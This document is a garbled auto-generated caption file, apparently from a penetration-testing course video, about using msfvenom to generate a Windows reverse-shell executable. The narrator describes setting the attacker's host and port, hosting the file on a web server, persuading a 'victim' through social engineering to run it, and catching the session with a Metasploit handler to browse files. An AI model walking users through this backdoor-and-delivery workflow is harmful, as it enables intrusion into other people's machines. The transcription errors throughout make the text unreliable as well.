WEBVTT

00:01.320 --> 00:08.330
Hello you in the previous few do we have discussed about the need of creating custom Bambos and he had

00:08.610 --> 00:16.570
seen that he had MSF payload and I in good which has been pledged by MSF then.

00:16.650 --> 00:19.250
This we do discuss about Emersonian.

00:19.450 --> 00:22.830
Now will talk about the introduction to this of vinum.

00:22.830 --> 00:28.080
Advantages of using a mix of venom and some common language of the sea.

00:28.400 --> 00:32.190
So venom is a combination of a payload and up in court.

00:32.250 --> 00:37.980
Both of these tools into a single pre-book instance for people who have been working on those by for

00:37.980 --> 00:39.040
a long time.

00:39.390 --> 00:44.730
They know that a field or that inmates have in this have been in service to the hacking community for

00:44.730 --> 00:47.660
almost 10 years before it has been.

00:47.850 --> 00:51.450
It will be that the spectrum will and replace it.

00:51.480 --> 00:59.640
And this event as a happened and has replaced both emancipator and this and called on June 2000 to see

01:00.030 --> 01:02.310
the advantage of using a massive UNAM is.

01:02.380 --> 01:09.390
So one thing to instead of having two different groups for the purpose it has standardized command line

01:09.390 --> 01:10.290
options.

01:10.410 --> 01:17.130
So using him as a venom is not so good as compared to wish this on the facts.

01:17.210 --> 01:19.950
And it has a wide range of options available.

01:20.040 --> 01:25.920
They are using and this is going to just quickly move on to a culture machine and see how we can use

01:26.250 --> 01:27.800
this if an.

01:27.920 --> 01:29.560
So this is my golly machine.

01:29.660 --> 01:33.340
And how will they have a massive consumer running.

01:33.370 --> 01:34.310
But.

01:34.760 --> 01:41.570
I'm sure you remember how to start post-K service that initialize the database and then the MSF control

01:41.630 --> 01:46.070
come on to that aspect running not open a new terminal

01:48.760 --> 01:53.280
nor pay a misspend them space it for help.

01:53.460 --> 01:59.190
So for using a massive unknown you don't have to open up the as a console if you're just concentrating

01:59.190 --> 02:05.220
on creating the searches and most of them is a standalone payload generator.

02:05.280 --> 02:08.920
Also the placement put in is a payload in an answer.

02:09.040 --> 02:13.270
And now the options available here are these.

02:13.350 --> 02:17.620
So I can see the loops to use them as venom.

02:17.760 --> 02:19.220
Using the minus view option.

02:19.230 --> 02:20.150
I can define.

02:20.340 --> 02:25.710
I can see a list of murder type the options can be payloads in corders maps and all.

02:25.710 --> 02:32.420
So before I start using a payload I can see a list and so M. supports moving down.

02:32.520 --> 02:35.150
I can define the output format.

02:35.160 --> 02:41.050
I can also see the list of available formats that most of them support something called encoders will

02:41.070 --> 02:44.290
be discussing in the next group to define the architecture.

02:44.340 --> 02:50.900
In fact some of the payload and so on the other options will be used along with the emissive M.Com.

02:50.910 --> 03:00.330
So just for a quick overview if I type in the NUM minus I've an open lock for this church showed me

03:00.860 --> 03:06.960
say I have a list of all the platform supported I need to type in the name.

03:07.020 --> 03:14.620
And I've been well then partnered by all these people nobody else.

03:14.780 --> 03:22.830
This short list of 11 laptops so you can see the backlog is listed over here includes Windows Ruby Macintosh

03:22.860 --> 03:30.570
OS Linux Cisco Solaris network and great and the list continues to grow there are options.

03:30.630 --> 03:36.740
So all the common platforms which are user can be using are listed over here.

03:36.840 --> 03:47.180
If I type in and answer them and often help or match they should show me a list of all the available

03:47.180 --> 03:50.430
for Macs which I can this is supports.

03:50.870 --> 03:52.360
So do foreign markets means.

03:52.460 --> 03:55.670
This would be the format in which I can create a cafe.

03:55.970 --> 04:03.180
And again you can see all the most commonly used are supported is open.

04:03.220 --> 04:07.690
Now let's take a quick example to see how we can use emissive and then to create a.

04:07.940 --> 04:15.750
And then appreciate that both of them and they executed how easily we can get the commercial on them.

04:16.070 --> 04:24.530
So to create a bat or type in most of them and if I got to get is on this platform Windows then I would

04:24.530 --> 04:33.260
type in the architecture but I think in my next architected 686 for the basics architecture is minus

04:33.530 --> 04:36.440
black form and that would be Windows.

04:36.440 --> 04:42.080
Since my system is on Windows machine and then you need to really find the payload which you want to

04:42.080 --> 04:42.470
use.

04:42.470 --> 04:50.540
So for Windows I will use the windows and the fear to flash and so forth.

04:50.770 --> 04:57.870
PC You also need to pipe in the host for the typical day.

04:57.950 --> 05:10.300
So I go in and host is 1 9 2 1 6 6 1 for from about 130 the IP address of the machine type in a form

05:10.310 --> 05:18.030
on which you want this tradition to be established to allow for the court to type in something like.

05:18.250 --> 05:19.640
Whoa whoa whoa whoa whoa.

05:19.870 --> 05:26.680
And then I need to define the format that that would be easy 5:37 because you could and the Windows

05:26.680 --> 05:27.670
machine.

05:27.670 --> 05:35.520
So once we find all this option I any the option for architecture then platform is Windows hyping before

05:35.850 --> 05:47.060
to fail or prove you used a host and L4 on the format I will save this file some it can give it a name

05:47.060 --> 05:48.860
like the exam.

05:48.920 --> 05:53.210
Third party easy and funds at best and take them on.

05:53.260 --> 05:54.950
You could start the process.

05:55.020 --> 05:58.690
And my good my math book should be good.

05:58.840 --> 06:03.830
Next is no one called her backpack specified of putting it off the floor.

06:03.870 --> 06:10.580
It seems I have not specified any other option but on the black form and the OR it I just get it out

06:10.670 --> 06:19.870
of paper plates and the size is 333 votes if I want to find this is this tape then by then the file

06:19.870 --> 06:21.940
name and I can say it is.

06:22.080 --> 06:22.930
MS Windows.

06:22.980 --> 06:29.240
Not only does need it to be done is somehow transposed this by actually the machine you can use your

06:29.240 --> 06:30.960
source in breaks.

06:30.970 --> 06:34.670
You can go after me and you can share this finding the Nikolsk share.

06:34.820 --> 06:38.720
Or you can upload it on to some stunning ording links.

06:38.750 --> 06:46.740
And so anyhow once the file reaches the different machine on these security you can easily get to more.

06:46.920 --> 06:51.080
Here it is much more before the CAME ON works in and run this file.

06:51.210 --> 06:54.140
You should have a handler running on the console.

06:54.140 --> 07:00.120
So what we're doing is this booklist part may have this of us so that we can share the file to the local

07:00.510 --> 07:01.270
city.

07:01.640 --> 07:09.540
So my bill because that vote is going now I will just move the file folder the X-Fi.

07:10.340 --> 07:18.320
So once this is done quickly move to emissive console and over here the need to find the handler to

07:18.320 --> 07:19.440
use.

07:19.510 --> 07:27.880
And they find the angle which will be responsible for and that will be incoming from the machine.

07:28.280 --> 07:29.550
That.

07:29.950 --> 07:37.760
And you know I need to really find the same field which was used for getting the number of line to be

07:37.970 --> 07:38.930
used.

07:38.990 --> 07:47.170
Windows and people learned not to see the options and need to find the hook.

07:47.200 --> 07:59.690
So you said host that would be my first machine IP address 1 9 3 2 1 6 8.

07:59.750 --> 08:03.420
And remember we had to change the board also.

08:03.500 --> 08:06.780
So that would be no change.

08:07.240 --> 08:15.630
So once you're done with defining thinks you're ready to go you just need to exploit study handlers

08:15.690 --> 08:19.840
and just type in right.

08:19.890 --> 08:26.790
See that the U-verse handler is running struttin the payload handler we need to make sure that the victim

08:26.790 --> 08:33.870
non-certified an executive and that probably depends on how you doing the social meeting with the victim.

08:33.900 --> 08:40.880
I just opened the web server my machine IP address in the browser the Apache web server is already running

08:40.920 --> 08:41.520
over there.

08:41.520 --> 08:43.710
Can you hear it as an example.

08:43.710 --> 08:45.950
RTX you find along with some people there.

08:46.000 --> 08:46.850
Also available.

08:46.940 --> 08:48.620
I just save this file.

08:48.700 --> 08:52.500
So say part of it does say we don't have it on the computer.

08:52.500 --> 08:56.400
No this is don't let us that Naish you know searching clicks.

08:56.430 --> 09:03.730
So I made a send file as an attachment and country the user to download that on display.

09:03.740 --> 09:06.880
See one sided double click on this one before.

09:07.260 --> 09:14.480
Can you see the fedora is still running in those machines.

09:14.630 --> 09:16.870
I just need to click on this.

09:16.900 --> 09:18.210
Tell us McCullen.

09:18.270 --> 09:19.530
Yes.

09:19.800 --> 09:27.750
And in the meantime you see my preprint book is sending the Stager and they made a petition has been

09:27.960 --> 09:28.870
established.

09:28.920 --> 09:34.660
So I did not have to Bahama's scan on the machine to see what your total.

09:34.710 --> 09:41.490
I did not have to find the vulnerabilities existing or was there I just had to create up that by using

09:41.490 --> 09:48.020
the payloads because such a purpose and then send the client with the victim somehow the victim a security

09:48.020 --> 09:48.740
file.

09:48.790 --> 09:53.320
And if my handle is running I get the same connection.

09:53.460 --> 09:59.850
So that is the benefit of creating custom back boasts that you don't have to rely on the liberties that

10:00.120 --> 10:06.100
really use the money that can be based on what the situation is you can pay for using any of that do

10:06.120 --> 10:06.890
matter.

10:06.990 --> 10:12.210
The first one is scanning through the machine and finding the vulnerabilities and the second one is

10:12.210 --> 10:18.020
obviously getting a bad foot and sending it to him and somehow convincing them to the fight.

10:18.030 --> 10:23.600
So now I can see I can do this and I can get a list of all the files on the Internet.

10:23.700 --> 10:30.480
There is next to no live from the apartment or in a previous video so you know how can I start using

10:30.480 --> 10:34.780
my computer now and get more details from the company.

10:34.830 --> 10:41.430
So in this video we had a quick overview of MSF M. and we saw how we can use him as a M. Ducati to custom

10:41.430 --> 10:41.950
that.

10:42.150 --> 10:44.820
Then the next we do a very discuss about and us.